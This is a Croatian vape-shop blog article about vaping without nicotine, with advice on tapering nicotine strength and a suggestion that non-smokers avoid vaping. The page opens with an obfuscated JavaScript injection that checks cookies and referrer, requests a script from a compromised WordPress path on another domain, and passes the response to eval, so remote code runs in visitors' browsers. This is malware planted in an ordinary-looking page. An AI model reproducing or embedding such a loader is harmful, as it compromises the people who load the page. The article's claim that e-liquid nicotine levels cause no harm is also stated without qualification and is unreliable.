;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Parenje bez nikotina – Ima li smisla?

Većina medicinskih stručnjaka sada se slaže da su e-cigarete puno sigurnije od njihovih starih duhanskih kolega, ali mnogi pušači koji razmišljaju o tome da ih probaju i dalje imaju neka pitanja. Jedna stvar koju (začudo) često čujemo je pitanje: “Je li sigurno pariti bez nikotina?”

Ovo je neobično jer su prenaglašene opasnosti ove supstance jedan od najčešće citiranih razloga zašto su e-cigarete loše i moraju se kontrolirati. Neke su zemlje čak donijele zakone koji ograničavaju sadržaj nikotina; u EU najjače tekućine koje se mogu prodati su 20mg/ml, a u Australiji ne možete legalno kupiti e-tekućinu s nikotinom.

Da, nikotin je otrovan u velikim dozama, ali koncentracije i količine u e-tekućinama – čak i one jače koje se nalaze izvan EU – neće vam štetiti. Nikotin čak i ne izaziva ovisnost u istoj mjeri i na isti način ako je odvojen od ostalih kemikalija u duhanskom dimu, tako da je parenje čak i s te strane sigurnije.

Pa zašto su ljudi zabrinuti za sigurnost vapinga bez nikotina? To je zapravo dobro pitanje. Izbacivanje nikotina iz tekućine zasigurno jene čini otrovnijom, ali ipak treba postaviti neka legitimna pitanja.

Zašto uopće pariti bez nikotina?

Većina vapera koristi tekućinu koja sadrži nikotin, ali ne svi. Ako parite kao način da prestanete pušiti ili da se klonite cigareta, možda nije sigurno pariti bez nikotina. Mogući rizik nema nikakve veze s vapingom općenito, već bi vam vaša e-cigareta mogla biti toliko nezadovoljavajuća da odete i kupite kutiju Marlbora.

Neki bivši pušači koji su prešli na vaping žele potpuno izbaciti nikotin. To je u redu, ali važno je ne ići prebrzo. Smanjujte postupno, malim koracima, i uzmite si vremena. Većina pušača koji prijeđu na e-cigarete trebali bi početi s visokim koncentracijama nikotina poput 18 mg/ml ako koriste uređaje koji daju dovoljno malu količinu pare da podsjeća na količinu dima koji povučemo iz klasične cigarete prilikom jednog udaha. Nakon nekoliko mjeseci možete pokušati smanjiti na 12 mg/ml, a zatim za nekoliko mjeseci spustiti na 6.

Ovo se čini sporo, ali zapamtite da ako ste bivši pušač, vaše tijelo je naviklo na nikotin. Ako pokušate svesti na nulu za nekoliko mjeseci, vjerojatno ćete pogriješiti, a postoji velika šansa da ćete ponovno pušiti. Bolje je pariti tekućine s visokim sadržajem nikotina do kraja života nego pušiti još mjesec dana jer vam količina nikotina u e-cigaretama neće naškoditi.

Mnogi bivši pušači rado nastavljaju s vapingom, a ako to zvuči kao nešto što bi i vama bilo prihvatljivo, stvarno nema smisla pokušavati izbaciti nikotin. Čak nije nužno ni smanjiti koncentraciju nikotina ukoliko vam jača tekućina odgovara.

Ipak, primijetit ćete ponekad da s novim uređajem morate malo prilagoditi koncentraciju nikotina u tekućini jer uređaj ili daje više pare nego što ste navikli ili osjećate jači throat hit ili ti udarac u grlo. Ukoliko vam količina nikotina koju parite fizički smeta ili stvara neugodu, svakako razmislite o smanjenju.

Neki pak korisnici vide vaping kao rješenje na pola puta koje je samo alat da u potpunosti prestanu koristiti sve nikotinske proizvode, a ne samo cigarete. U tom slučaju ima smisla postupno snižavati razinu nikotina, ali važno je ne žuriti. Ako namjeravate smanjiti svoj nikotin na nulu tijekom godine dana, a zatim smanjite parenje dok potpuno ne prestanete nakon sljedećih šest mjeseci, to je vjerojatno izvedivo.

Problem vapera nepušača

Ali što ako želite isprobati vaping, a niste pušač? To ovisi o tome zašto ga želite isprobati.

Ako ste u iskušenju da probate pušiti, onda svakako isprobajte vape; to je mnogo sigurnija alternativa, a ako se možete odvratiti od klasičnih cigareta, to su sve dobre vijesti. U ovom slučaju, zašto koristiti nikotin ako već niste?

S druge strane, ako želite početi pariti jer želite isprobati trikove, ili mislite da izgleda super, vjerojatno je najbolje da se ne trudite. “Trkovi” zapravo i nisu toliko impresivni, a vaping vas neće pretvoriti u boga popularnosti.

Iako se slažemo da su rizici parenja daleko manji nego kod pušenja, vjerojatno nisu jednaki nuli; zašto im se izlagati samo da bi izbacivali kolute pare na nos na YouTubeu?

Svakako je najbolje rješenje ne koristiti ništa od duhanskih proizvoda i njihovih alternativa ukoliko se to može izbjeći, a to uključuje i e-tekućine bez nikotina.

Stoga bi naš savjet za kraj bio da ukoliko niste pušač i ne planirate postati pušač u skorije vrijeme, zaobiđite i vaping jer vam nije potreban.

Choose your Reaction!
Leave a Comment